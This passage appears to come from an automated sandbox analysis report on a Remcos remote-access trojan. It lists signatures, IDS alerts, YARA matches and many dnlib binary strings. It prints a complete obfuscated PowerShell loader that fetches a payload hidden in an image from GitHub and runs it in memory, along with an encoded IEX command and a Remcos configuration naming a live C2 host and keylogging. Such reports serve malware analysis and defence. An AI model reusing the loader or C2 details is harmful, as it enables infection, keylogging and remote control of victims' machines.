((gV '*MdR*').Name[3,11,2]-JoIN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe,

                      Data Obfuscation

                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\p44lx5ym\p44lx5ym.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\p44lx5ym\p44lx5ym.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'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'+[ChAr]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3812, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\p44lx5ym\p44lx5ym.cmdline", ProcessId: 5016, ProcessName: csc.exe

                      Stealing of Sensitive Information

                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 3092, TargetFilename: C:\ProgramData\remcos\logs.dat
                      Timestamp                       | SID     | Severity | Classtype                                     | Source IP       | Source Port | Destination IP  | Destination Port | Protocol
                      2024-10-14T11:36:13.997130+0200 | 2020423 | 1        | Exploit Kit Activity Detected                 | 192.3.220.40    | 80          | 192.168.2.5     | 49708            | TCP
                      2024-10-14T11:36:13.997130+0200 | 2020425 | 1        | Exploit Kit Activity Detected                 | 192.3.220.40    | 80          | 192.168.2.5     | 49708            | TCP
                      2024-10-14T11:36:15.871804+0200 | 2036594 | 1        | Malware Command and Control Activity Detected | 192.168.2.5     | 49714       | 135.148.195.248 | 6875             | TCP
                      2024-10-14T11:36:16.762466+0200 | 2036594 | 1        | Malware Command and Control Activity Detected | 192.168.2.5     | 49722       | 135.148.195.248 | 6875             | TCP
                      2024-10-14T11:36:13.042897+0200 | 2049038 | 1        | A Network Trojan was detected                 | 185.199.111.133 | 443         | 192.168.2.5     | 49707            | TCP
                      2024-10-14T11:36:16.900244+0200 | 2803304 | 3        | Unknown Traffic                               | 192.168.2.5     | 49723       | 178.237.33.50   | 80               | TCP

                      AV Detection

                      Source: 0000000B.00000002.4471996980.00000000013B0000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": "idabo.duckdns.org:6875:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-I89M3S", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                      Source: na.hta | Virustotal: Detection: 26%
                      Source: Yara match | File source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 9.2.powershell.exe.5b84b60.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 9.2.powershell.exe.5b84b60.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0000000B.00000002.4471996980.00000000013EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000B.00000002.4474275239.0000000002D4E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000B.00000002.4471996980.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000009.00000002.2257703672.0000000005519000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000009.00000002.2257703672.000000000571D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: powershell.exe PID: 4720, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 3092, type: MEMORYSTR
                      Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                      Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,11_2_004338C8
                      Source: powershell.exe, 00000009.00000002.2257703672.000000000571D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_bab01ced-0

                      Exploits

                      Source: Yara match | File source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 9.2.powershell.exe.5b84b60.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 9.2.powershell.exe.5b84b60.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000009.00000002.2257703672.0000000005519000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000009.00000002.2257703672.000000000571D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: powershell.exe PID: 4720, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 3092, type: MEMORYSTR

                      Privilege Escalation

                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00407538 _wcslen,CoGetObject,11_2_00407538
                      Source: unknown | HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.5:49707 version: TLS 1.2
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000009.00000002.2279074921.0000000006BD0000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.pdb('D>'D 0'D_CorDllMainmscoree.dll source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2065247057.0000000006EB6000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: $]q8C:\Users\user\AppData\Local\Temp\p44lx5ym\p44lx5ym.pdb source: powershell.exe, 00000001.00000002.2119899349.00000000050F7000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2065318838.0000000006EC7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000009.00000002.2279074921.0000000006BD0000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.pdb source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
